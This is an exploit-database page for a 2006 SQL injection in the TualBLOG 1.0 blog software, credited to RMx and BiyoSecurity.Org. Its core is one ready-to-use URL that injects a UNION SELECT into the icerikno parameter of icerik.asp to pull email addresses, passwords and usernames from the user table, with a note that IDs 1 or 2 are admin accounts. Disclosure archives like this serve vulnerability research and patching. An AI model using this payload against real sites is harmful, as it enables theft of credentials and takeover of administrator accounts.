TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability



EDB-ID: 2362 CVE: 2006-4793OSVDB-ID: 28787
Author: RMxPublished: 2006-09-13Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )
# milw0rm.com [2006-09-13]






Comments

No comments so far